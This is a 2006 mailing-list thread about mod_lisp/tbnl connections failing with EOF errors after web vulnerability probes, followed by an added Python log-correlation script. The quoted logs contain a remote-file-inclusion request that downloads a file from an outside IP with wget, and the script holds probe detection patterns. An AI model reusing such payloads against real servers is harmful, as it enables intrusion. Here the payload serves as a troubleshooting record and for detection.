Every now and then I get hit by a sudden probe of various web script vulnerabilities. The requests look like this:
POST /xmlrpc/xmlrpc.php
POST /blogs/xmlsrv/xmlrpc.php
GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;c...
After these things happen, the connection between mod_lisp and tbnl starts to fail with this message in the apache logs:
[Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp
[Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp
Making requests to the website results in a 500 Internal Server Error.
I have looked at the listener object when this happens, and it seems to have 10 workers. After a few more requests (all 500 errors), the worker count drops down, and then suddenly things start working normally again.
What might be happening with the connection in this situation? Is there anything in the listener object I can inspect to discover why the mod_lisp connection is getting EOF?
Zach
Hi Zach!
On Wed, 5 Apr 2006 09:47:11 -0400, Zach Beane xach@xach.com wrote:
> Every now and then I get hit by a sudden probe of various web script vulnerabilities. The requests look like this:
> POST /xmlrpc/xmlrpc.php
> POST /blogs/xmlsrv/xmlrpc.php
> GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;c...
> After these things happen, the connection between mod_lisp and tbnl starts to fail with this message in the apache logs:
> [Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp
> [Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp
> Making requests to the website results in a 500 Internal Server Error.
> I have looked at the listener object when this happens, and it seems to have 10 workers. After a few more requests (all 500 errors), the worker count drops down, and then suddenly things start working normally again.
> What might be happening with the connection in this situation? Is there anything in the listener object I can inspect to discover why the mod_lisp connection is getting EOF?
Sorry for the loooooong delay. I'm /really/ busy... :)
Have you made any progress with this? I've tried to reproduce it (LWL and Apache 2) but everything worked fine. Which Lisp are you using?
ATM I don't really have an idea how to tackle this. Sometimes, when I was really desperate, I've hacked the mod_lisp C code to debug problems like this one, but that isn't fun. Actually, that was one of the reasons I wrote Hunchentoot...
I'm afraid I can't be more helpful right now.
Cheers, Edi.
On Fri, Apr 21, 2006 at 11:05:27PM +0200, Edi Weitz wrote:
> Hi Zach!
> On Wed, 5 Apr 2006 09:47:11 -0400, Zach Beane xach@xach.com wrote:
>> Every now and then I get hit by a sudden probe of various web script vulnerabilities. The requests look like this:
>> POST /xmlrpc/xmlrpc.php
>> POST /blogs/xmlsrv/xmlrpc.php
>> GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;c...
>> After these things happen, the connection between mod_lisp and tbnl starts to fail with this message in the apache logs:
>> [Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp
>> [Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp
>> Making requests to the website results in a 500 Internal Server Error.
>> I have looked at the listener object when this happens, and it seems to have 10 workers. After a few more requests (all 500 errors), the worker count drops down, and then suddenly things start working normally again.
>> What might be happening with the connection in this situation? Is there anything in the listener object I can inspect to discover why the mod_lisp connection is getting EOF?
> Sorry for the loooooong delay. I'm /really/ busy... :)
> Have you made any progress with this? I've tried to reproduce it (LWL and Apache 2) but everything worked fine. Which Lisp are you using?
I am using SBCL. I can't reproduce it either; it only seems to happen after that particular style of attack.
On the other hand, I recently announced a new toy (http://wigflip.com/saywhat/) and it got a few thousand visitors in a short period of time. Things wedged a few times in a completely different style, but again I am unable to reproduce, which makes troubleshooting very difficult.
> ATM I don't really have an idea how to tackle this. Sometimes, when I was really desperate, I've hacked the mod_lisp C code to debug problems like this one, but that isn't fun. Actually, that was one of the reasons I wrote Hunchentoot...
I'm thinking of going in a similar direction.
Zach
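
Added example, not part of the thread: one way to check the correlation described above, by flagging access-log requests that match the quoted probe style and listing the mod_lisp EOF errors logged shortly after each. The sample log lines, client addresses, the combined access-log format and the 60-second window are constructed assumptions, and both logs are assumed to share one local clock.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Signatures taken from the probe requests quoted in the thread.
PROBES = [re.compile(p, re.I) for p in (
    r"/xmlrpc\.php",                                # XML-RPC endpoint probes
    r"mosConfig_absolute_path=(?:https?|ftp)://",   # remote-include parameter
    r"_REQUEST\[|[?&]GLOBALS=",                     # PHP global overwrite attempt
)]
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3})')
EOF_RE = re.compile(r"^\[([^\]]+)\] \[error\] .*error reading from Lisp")

def parse_probes(access_lines):
    """Return (time, client, status, url) for requests matching a probe signature."""
    hits = []
    for line in access_lines:
        m = ACCESS_RE.match(line)
        if m and any(p.search(unquote(m.group(3))) for p in PROBES):
            # Assumption: the UTC offset is dropped; both logs share one local clock.
            when = datetime.strptime(m.group(2).split()[0], "%d/%b/%Y:%H:%M:%S")
            hits.append((when, m.group(1), int(m.group(4)), m.group(3)))
    return hits

def parse_eof_errors(error_lines):
    """Return timestamps of mod_lisp 'error reading from Lisp' entries."""
    found = (EOF_RE.match(line) for line in error_lines)
    return [datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y") for m in found if m]

def correlate(access_lines, error_lines, window_s=60):
    """Pair each probe with the EOF errors logged up to window_s seconds after it."""
    errors, window = parse_eof_errors(error_lines), timedelta(seconds=window_s)
    return [(probe, [e for e in errors if timedelta(0) <= e - probe[0] <= window])
            for probe in parse_probes(access_lines)]

# Constructed sample logs; addresses come from documentation ranges.
SAMPLE_ACCESS = [
    '198.51.100.7 - - [05/Apr/2006:08:19:40 -0400] "POST /xmlrpc/xmlrpc.php HTTP/1.0" 404 210',
    '198.51.100.7 - - [05/Apr/2006:08:19:45 -0400] "GET /index.php?option=com_content'
    '&mosConfig_absolute_path=http://203.0.113.9/cmd.txt? HTTP/1.0" 404 208',
    '192.0.2.10 - - [05/Apr/2006:08:19:50 -0400] "GET /about HTTP/1.1" 500 530',
    '192.0.2.10 - - [05/Apr/2006:08:25:00 -0400] "GET /about HTTP/1.1" 200 4100',
]
SAMPLE_ERRORS = [
    "[Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp",
    "[Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp",
]
```

A probe followed by EOF errors inside the window shows only that the two coincide in time; finding the cause still means looking at the Lisp side of the mod_lisp connection.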